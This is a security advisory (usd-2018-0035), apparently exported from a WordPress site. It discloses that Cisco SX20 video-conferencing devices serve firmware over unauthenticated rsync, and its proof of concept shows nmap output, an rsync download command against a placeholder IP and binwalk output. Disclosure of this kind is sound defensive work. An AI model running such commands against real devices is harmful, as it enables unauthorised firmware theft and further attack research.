{"id":16589,"date":"2021-07-08T10:46:06","date_gmt":"2021-07-08T08:46:06","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0035\/"},"modified":"2021-07-19T14:10:06","modified_gmt":"2021-07-19T12:10:06","slug":"usd-2018-0035","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0035\/","title":{"rendered":"usd-2018-0035"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0035 | Cisco Unified Communications Manager (CallManager)\/11.5.1.15900-18 (likely in all versions)<\/span><\/h1>\n<p><span><\/span><strong>Advisory ID<\/strong><span>: usd-2018-0035<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: Unified Communications Manager<\/span><br \/><strong>Affected Version<\/strong><span>: 11.5.1.15900-18 (likely in all versions)<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Exposure of Sensitive Configuration Data<\/span><br \/><strong>Security Risk<\/strong><span>: Medium<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.cisco.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cisco.com<\/a><br \/><strong>Vendor Status<\/strong><span>: \u201eis not considered to be an exposure\u201c<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p>usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.<\/p>\n<p>The Cisco SX20 TelePresence Quick is a set of devices that can be used for video conferencing. Typically they are paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.<\/p>\n<h3><\/h3>\n<h3>Proof of Concept (PoC)<\/h3>\n<p>Let 10.10.10.10 be the IP address of a SX20 device.<\/p>\n<p>An nmap scan identifies the following open services:<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]4043\/tcp  open  rsync           (protocol version 29)<br \/>\n4045\/tcp  open  lockd?<br \/>\n| fingerprint-strings:<br \/>\n|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer:<br \/>\n|     version: ce9.4.1 6ae80e1f2ee 2018-08-14<br \/>\n|     method: rsync<br \/>\n|     url: rsync:\/\/[::ffff:10.10.10.10]:4043\/idefix\/idefix.pkg<br \/>\n|_    targets: 102300-3,102310-0,102310-1,101282-0<\/code><\/pre>\n<div class=\"x-text\"><\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"x-text\">\n<p>The following command will download the idefix.pkg file advertised by TCP port 4045:<br \/># rsync rsync:\/\/[::ffff:10.10.10.10]:4043\/idefix\/idefix.pkg .<\/p>\n<p>Using binwalk, the file is identified as a firmware package:<br \/># binwalk idefix.pkg<\/p>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]DECIMAL       HEXADECIMAL     DESCRIPTION<br \/>\n--------------------------------------------------------------------------------<br \/>\n3487          0xD9F           PEM certificate<br \/>\n7324          0x1C9C          Executable script, shebang: \"\/bin\/sh\"<br \/>\n13549         0x34ED          Unix path: \/sys\/class\/i2c-adapter\/i2c-4\/4-0054\/eeprom@101:16<br \/>\n13613         0x352D          Unix path: \/sys\/class\/i2c-adapter\/i2c-4\/4-0054\/eeprom@96:5<br \/>\n13672         0x3568          Unix path: \/sys\/class\/gpio\/gpio137\/value<br \/>\n13808         0x35F0          Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20<br \/>\n44361273      0x2A4E639       uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: \"CISCO firmware 32\"<br \/>\n44496781      0x2A6F78D       CRC32 polynomial table, little endian<br \/>\n44505174      0x2A71856       Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: \"oo long\"<br \/>\n44607241      0x2A8A709       CRC32 polynomial table, little endian<br \/>\n44612405      0x2A8BB35       uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: \"CISCO ramdisk 20180605-3a15e0444CertISW\"<br \/>\n44613317      0x2A8BEC5       gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25<br \/>\n64949749      0x3DF0DF5       uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: \"CISCO kernel 20180605-3a15e04445CertISW\"<br \/>\n64967148      0x3DF51EC       gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00)<br \/>\n68741741      0x418EA6D       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34<br \/>\n89684647      0x5587AA7       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<div class=\"e11191-12 x-container max width\">\n<div class=\"e11191-13 x-column x-sm x-1-1\">\n<div class=\"x-text\">\n<p>Please note that at the point of this writing, usd AG has not performed any additional firmware analysis.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"e11191-20 x-container max width\">\n<div class=\"e11191-21 x-column x-sm x-1-1\"><\/div>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Enable authentication for the rsync service or disable it if possible.<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-10-31 Advisory has been sent to psirt@cisco.com<\/li>\n<li>2018-11-07 Cisco states that they they do not consider this to be an exposure<\/li>\n<li>2018-11-09 extended public disclosure deadline to 2019-01-23<\/li>\n<li>2019-01-23 Security advisory released<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>This security vulnerability was discovered by Marcus Gruber and Maximilian Boehner of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0035 | Cisco Unified Communications Manager (CallManager)\/11.5.1.15900-18 (likely in all versions) Advisory ID: usd-2018-0035CVE Number: N\/AAffected Product: Unified Communications ManagerAffected Version: 11.5.1.15900-18 (likely in all versions)Vulnerability Type: Exposure of Sensitive Configuration DataSecurity Risk: MediumVendor URL: https:\/\/www.cisco.comVendor Status: \u201eis not considered to be an exposure\u201c Description usd discovered that Cisco SX20 devices allow attackers on the [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16589","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16589"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16589\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}